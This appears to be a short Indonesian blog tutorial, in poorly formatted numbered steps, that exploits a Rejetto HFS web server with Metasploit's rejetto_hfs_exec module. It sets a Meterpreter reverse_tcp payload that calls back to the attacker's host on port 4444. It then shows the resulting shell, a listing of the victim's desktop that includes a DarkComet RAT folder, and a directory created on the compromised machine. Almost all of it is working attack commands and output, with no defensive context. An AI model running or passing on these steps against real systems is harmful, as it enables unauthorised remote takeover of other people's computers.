1 OPEN TERMINAL
┌─[✗]─[root@parrot]─[/home/budhya]
└──╼
#msfconsole
2
msf > use
exploit/windows/http/rejetto_hfs_exec
msf
exploit(rejetto_hfs_exec) >
3 set PAYLOAD
windows/meterpreter/reverse_tcp
show options
4 msf
exploit(rejetto_hfs_exec) > set RHOST (192.168.1.102) ip target
RHOST =>
192.168.1.102
5 msf
exploit(rejetto_hfs_exec) > set SRVHOST 192.168.1.110 ( IP KITA)
SRVHOST =>
192.168.1.110
6 msf
exploit(rejetto_hfs_exec) > set LHOST 192.168.1.110
LHOST =>
192.168.1.110
7 msf
exploit(rejetto_hfs_exec) > set LPORT 4444
LPORT => 4444
8 msf
exploit(rejetto_hfs_exec) > exploit
9 meterpreter >
shell
Process 3180
created.
Channel 2 created.
10 netx for loking
diterc tory
meterpreter > ls
Listing:
C:\Users\monyonk\Desktop
=================================
Mode
Size Type Last modified Name
----
---- ---- ------------- ----
40777/rwxrwxrwx 0
dir 2015-09-06 22:26:18 +0700 %TEMP%
100666/rw-rw-rw-
26125 fil 2015-09-02 20:50:05 +0700 Generate-Macro.ps1
100666/rw-rw-rw-
1436 fil 2015-09-02 21:13:02 +0700 RegistryCleanup.ps1
100666/rw-rw-rw-
171 fil 2015-09-02 21:11:47 +0700 SchTaskCleanup.ps1
40777/rwxrwxrwx 0
dir 2015-08-27 17:52:27 +0700 darkcomet 5.3.1
100666/rw-rw-rw-
282 fil 2014-12-30 01:27:27 +0700 desktop.ini
40777/rwxrwxrwx 0
dir 2015-09-06 22:08:57 +0700 egy.txt
40777/rwxrwxrwx 0
dir 2015-09-06 22:09:15 +0700 egywashere
40777/rwxrwxrwx 0
dir 2015-09-06 22:12:49 +0700 egyyyyyy
100777/rwxrwxrwx
2498560 fil 2014-08-24 21:18:36 +0700 hfs.exe
40777/rwxrwxrwx 0
dir 2015-09-06 22:13:20 +0700 ijinmassayasdhmasuk
40777/rwxrwxrwx 0
dir 2015-09-06 22:25:42 +0700 koramil.exe
40777/rwxrwxrwx 0
dir 2015-09-06 22:25:41 +0700 reky
11 create new file
meterpreter >
mkdir jagotarung.exe
Creating directory:
jagotarung.exe
12 meterpreter >ls
Tidak ada komentar:
Posting Komentar